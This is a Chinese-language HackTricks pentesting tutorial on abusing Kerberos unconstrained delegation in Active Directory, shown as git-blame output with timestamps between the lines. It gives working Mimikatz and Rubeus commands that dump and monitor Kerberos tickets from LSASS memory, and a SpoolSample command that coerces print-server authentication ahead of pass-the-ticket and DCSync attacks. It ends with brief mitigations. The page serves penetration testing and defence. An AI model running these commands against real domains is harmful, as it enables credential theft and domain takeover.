2023-08-03 19:12:22 +00:00
|
|
|
|
# 无限制委派
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* 你在一家**网络安全公司**工作吗?你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 发现我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
|
|
|
|
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## 无限制委派
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
这是域管理员可以设置给域内任何**计算机**的功能。然后,每当**用户登录**到计算机上时,该用户的**TGT副本**将被发送到DC提供的TGS中,并保存在LSASS的内存中。因此,如果您在计算机上具有管理员权限,您将能够**转储票据并冒充用户**在任何计算机上。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
因此,如果域管理员在启用了"无限制委派"功能的计算机上登录,并且您在该计算机上具有本地管理员权限,则您将能够转储票据并在任何地方冒充域管理员(域提权)。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
您可以通过检查[userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx)属性是否包含[ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx)来**查找具有此属性的计算机对象**。您可以使用LDAP过滤器'(userAccountControl:1.2.840.113556.1.4.803:=524288)'来执行此操作,这就是powerview所做的:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
<pre class="language-bash"><code class="lang-bash"># 列出无限制计算机
|
2022-08-14 20:36:09 +00:00
|
|
|
|
## Powerview
|
2023-08-03 19:12:22 +00:00
|
|
|
|
Get-NetComputer -Unconstrained #DCs总是出现但对提权无用
|
2022-08-14 20:36:09 +00:00
|
|
|
|
<strong>## ADSearch
|
|
|
|
|
</strong>ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
|
2023-08-03 19:12:22 +00:00
|
|
|
|
<strong># 使用Mimikatz导出票据
|
2022-08-14 20:36:09 +00:00
|
|
|
|
</strong>privilege::debug
|
2023-08-03 19:12:22 +00:00
|
|
|
|
sekurlsa::tickets /export #推荐的方法
|
|
|
|
|
kerberos::list /export #另一种方法
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
# 监视登录并导出新票据
|
|
|
|
|
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #每10秒检查新的TGT</code></pre>
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
使用**Mimikatz**或**Rubeus**将管理员(或受害者用户)的票据加载到内存中,进行[**传递票据攻击**](pass-the-ticket.md)。\
|
|
|
|
|
更多信息:[https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\
|
|
|
|
|
[**有关无限制委派的更多信息,请参考ired.team。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
### **强制认证**
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
如果攻击者能够**入侵允许"无限制委派"的计算机**,他可以**欺骗**一个**打印服务器**自动登录该计算机,并将TGT保存在服务器的内存中。\
|
|
|
|
|
然后,攻击者可以执行**传递票据攻击**以冒充用户打印服务器计算机账户。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
要使打印服务器登录到任何计算机,您可以使用[**SpoolSample**](https://github.com/leechristensen/SpoolSample):
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
2022-08-14 20:36:09 +00:00
|
|
|
|
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```
|
2023-08-03 19:12:22 +00:00
|
|
|
|
如果TGT来自域控制器,您可以执行[**DCSync攻击**](acl-persistence-abuse/#dcsync)并获取来自域控制器的所有哈希值。\
|
|
|
|
|
[**在ired.team上了解更多关于此攻击的信息。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
**以下是其他尝试强制进行身份验证的方法:**
|
2022-08-14 20:36:09 +00:00
|
|
|
|
|
|
|
|
|
{% content-ref url="printers-spooler-service-abuse.md" %}
|
|
|
|
|
[printers-spooler-service-abuse.md](printers-spooler-service-abuse.md)
|
|
|
|
|
{% endcontent-ref %}
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
### 缓解措施
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* 限制DA/Admin登录到特定服务
|
|
|
|
|
* 对特权帐户设置"帐户是敏感的,不能委派"
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* 您在**网络安全公司**工作吗?您想在HackTricks中看到您的**公司广告**吗?或者您想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 发现我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
|
|
|
|
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享您的黑客技巧**。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|